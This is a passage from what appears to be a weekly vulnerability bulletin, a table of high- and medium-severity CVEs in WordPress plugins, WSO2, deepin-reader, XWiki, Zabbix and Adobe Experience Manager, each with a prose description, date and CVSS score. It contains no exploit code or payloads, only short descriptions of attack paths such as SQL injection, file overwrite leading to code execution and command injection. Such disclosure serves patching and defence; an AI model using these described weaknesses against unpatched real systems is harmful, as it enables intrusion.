wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9. | 2023-12-18 | 8.8 | CVE-2023-48768 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble - Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble - Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3. | 2023-12-18 | 8.8 | CVE-2023-48769 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0. | 2023-12-18 | 8.8 | CVE-2023-48772 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4. | 2023-12-18 | 8.8 | CVE-2023-48773 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5. | 2023-12-18 | 8.8 | CVE-2023-48778 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0. | 2023-12-18 | 8.8 | CVE-2023-48781 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon. This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0. | 2023-12-18 | 8.8 | CVE-2023-49153 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator - easily Button Builder. This issue affects Button Generator - easily Button Builder: from n/a through 2.3.8. | 2023-12-18 | 8.8 | CVE-2023-49155 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.5. | 2023-12-18 | 8.8 | CVE-2023-49163 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra. This issue affects Ocean Extra: from n/a through 2.2.2. | 2023-12-19 | 8.8 | CVE-2023-49164 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2. | 2023-12-15 | 8.8 | CVE-2023-49197 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3. | 2023-12-15 | 8.8 | CVE-2023-49744 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23. | 2023-12-15 | 8.8 | CVE-2023-49749 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0. | 2023-12-17 | 8.8 | CVE-2023-49751 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz - WooCommerce Comments. This issue affects WooDiscuz - WooCommerce Comments: from n/a through 2.3.0. | 2023-12-18 | 8.8 | CVE-2023-49759 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage. This issue affects WPsoonOnlinePage: from n/a through 1.9. | 2023-12-18 | 8.8 | CVE-2023-49760 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce. This issue affects Product Enquiry for WooCommerce: from n/a through 3.0. | 2023-12-18 | 8.8 | CVE-2023-49761 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite. This issue affects CSprite: from n/a through 1.1. | 2023-12-18 | 8.8 | CVE-2023-49763 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4. | 2023-12-17 | 8.8 | CVE-2023-49769 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8. | 2023-12-17 | 8.8 | CVE-2023-49775 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4. | 2023-12-17 | 8.8 | CVE-2023-49816 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1. | 2023-12-17 | 8.8 | CVE-2023-49824 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX - Currency Switcher Professional for WooCommerce. This issue affects FOX - Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4. | 2023-12-17 | 8.8 | CVE-2023-49834 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5. | 2023-12-18 | 8.8 | CVE-2023-49840 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21. | 2023-12-18 | 8.8 | CVE-2023-49843 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0. | 2023-12-18 | 8.8 | CVE-2023-49844 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kurulu?u A.?. PayTR Taksit Tablosu - WooCommerce. This issue affects PayTR Taksit Tablosu - WooCommerce: from n/a through 1.3.1. | 2023-12-18 | 8.8 | CVE-2023-49853 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy - Smart Side Cart for WooCommerce. This issue affects Caddy - Smart Side Cart for WooCommerce: from n/a through 1.9.7. | 2023-12-18 | 8.8 | CVE-2023-49854 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3. | 2023-12-18 | 8.8 | CVE-2023-49855 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1. | 2023-12-18 | 8.8 | CVE-2023-50372 audit@patchstack.com |
wordpress -- wordpress | The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution. | 2023-12-18 | 8.8 | CVE-2023-5882 contact@wpscan.com |
wordpress -- wordpress | The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. | 2023-12-18 | 8.8 | CVE-2023-5886 contact@wpscan.com |
wordpress -- wordpress | The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2023-12-15 | 8.8 | CVE-2023-6827 security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP. | 2023-12-23 | 8.1 | CVE-2023-6971 security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | The Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-23 | 7.4 | CVE-2020-36769 security@wordfence.com security@wordfence.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy. This issue affects Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12. | 2023-12-20 | 7.1 | CVE-2023-26525 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2. | 2023-12-20 | 7.1 | CVE-2023-28788 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2. | 2023-12-20 | 7.6 | CVE-2023-30872 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box - Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box - Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7. | 2023-12-20 | 7.2 | CVE-2023-32128 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1. | 2023-12-20 | 7.6 | CVE-2023-32743 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce Product Vendors allows SQL Injection. This issue affects Product Vendors: from n/a through 2.1.76. | 2023-12-18 | 7.2 | CVE-2023-33331 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2. | 2023-12-20 | 7.5 | CVE-2023-35914 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Automattic WooPayments - Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments - Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. | 2023-12-20 | 7.6 | CVE-2023-35915 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments - Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments - Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. | 2023-12-20 | 7.5 | CVE-2023-35916 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MainWP MainWP Dashboard - WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard - WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3. | 2023-12-20 | 7.6 | CVE-2023-38519 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. | 2023-12-20 | 7.4 | CVE-2023-46147 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf - Export To Pdf Tool for WordPress. This issue affects E2Pdf - Export To Pdf Tool for WordPress: from n/a through 1.20.18. | 2023-12-19 | 7.2 | CVE-2023-46154 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8. | 2023-12-20 | 7.6 | CVE-2023-47236 audit@patchstack.com |
wordpress -- wordpress | The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitize the `wp_query` parameter which allows an attacker to run arbitrary command on the remote server | 2023-12-18 | 7.2 | CVE-2023-4724 contact@wpscan.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection. This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7. | 2023-12-18 | 7.2 | CVE-2023-47530 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5. | 2023-12-20 | 7.2 | CVE-2023-47852 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin - JobWP. This issue affects WordPress Job Board and Recruitment Plugin - JobWP: from n/a through 2.1. | 2023-12-21 | 7.5 | CVE-2023-48288 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WC Vendors WC Vendors - WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors. This issue affects WC Vendors - WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7. | 2023-12-19 | 7.6 | CVE-2023-48327 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in QuantumCloud AI ChatBot. This issue affects AI ChatBot: from n/a through 4.7.8. | 2023-12-19 | 7.2 | CVE-2023-48741 audit@patchstack.com |
wordpress -- wordpress | Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4. | 2023-12-15 | 7.5 | CVE-2023-49159 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Younes JFR. Advanced Database Cleaner. This issue affects Advanced Database Cleaner: from n/a through 3.1.2. | 2023-12-19 | 7.2 | CVE-2023-49764 audit@patchstack.com |
wordpress -- wordpress | The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorized users from accessing password-protected posts' content. | 2023-12-18 | 7.5 | CVE-2023-5949 contact@wpscan.com |
wordpress -- wordpress | The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request | 2023-12-18 | 7.5 | CVE-2023-6203 contact@wpscan.com |
wordpress -- wordpress | IThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks | 2023-12-18 | 7.2 | CVE-2023-6222 contact@wpscan.com contact@wpscan.com |
wordpress -- wordpress | The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. | 2023-12-18 | 7.2 | CVE-2023-6295 contact@wpscan.com |
wordpress -- wordpress | The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2023-12-15 | 7.2 | CVE-2023-6826 security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the 'content-backups' and 'content-name', 'content-manifest', or 'content-bmitmp' and 'content-identy' HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. | 2023-12-23 | 7.5 | CVE-2023-6972 security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the 'url' parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system. | 2023-12-23 | 7.2 | CVE-2023-7002 security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50. | 2023-12-20 | 8.5 | CVE-2023-33330 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products. This issue affects Recently Viewed Products: from n/a through 1.0.0. | 2023-12-19 | 8.3 | CVE-2023-34027 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15. | 2023-12-20 | 8.4 | CVE-2023-47784 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenciDesign Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. | 2023-12-20 | 8.5 | CVE-2023-49825 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in PenciDesign Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. | 2023-12-21 | 8.1 | CVE-2023-49826 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection - Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection - Stop Brute Force Attacks: from n/a through 2.2.5. | 2023-12-19 | 7.6 | CVE-2023-48764 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2. | 2023-12-20 | 7.6 | CVE-2023-49161 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0. | 2023-12-20 | 7.6 | CVE-2023-49166 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3. | 2023-12-19 | 7.5 | CVE-2023-49819 audit@patchstack.com |
wso2 -- multiple_products | Multiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option. * A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation. | 2023-12-15 | 8.5 | CVE-2023-6837 ed10eef1-636d-4fbe-9993-6890dfa878f8 |
wso2 -- multiple_products | Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information. | 2023-12-15 | 7.5 | CVE-2023-6836 ed10eef1-636d-4fbe-9993-6890dfa878f8 |
wuhan_deepin_technology_co.,_ltd. -- deepin-reader | Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. | 2023-12-22 | 9.3 | CVE-2023-50254 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`. | 2023-12-15 | 8.8 | CVE-2023-50721 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`. | 2023-12-15 | 8.8 | CVE-2023-50722 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages. | 2023-12-15 | 8.8 | CVE-2023-50723 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
xwiki -- xwiki | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1. | 2023-12-21 | 8.3 | CVE-2023-50732 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. | 2023-12-15 | 7.5 | CVE-2023-50719 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
zabbix -- zabbix-agent | The vulnerability is caused by improper check for check if RDLENGTH does not overflow the buffer in response from DNS server. | 2023-12-18 | 8.1 | CVE-2023-32726 security@zabbix.com |
zabbix -- zabbix-agent2 | The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command resulting possible vulnerability for remote code execution. | 2023-12-18 | 9.8 | CVE-2023-32728 security@zabbix.com |
zabbix -- zabbix_server | The website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user. | 2023-12-18 | 8.8 | CVE-2023-32725 security@zabbix.com |
zabbix -- zabbix_server | An attacker who has the privilege to configure Zabbix items can use function icmpping() with additional malicious command inside it to execute arbitrary code on the current Zabbix server. | 2023-12-18 | 7.2 | CVE-2023-32727 security@zabbix.com |
Medium Vulnerabilities
Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-47064 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-47065 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48440 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction. | 2023-12-15 | 5.3 | CVE-2023-48441 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48442 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48443 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48444 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48445 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48446 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48447 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48448 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48449 psirt@adobe.com |
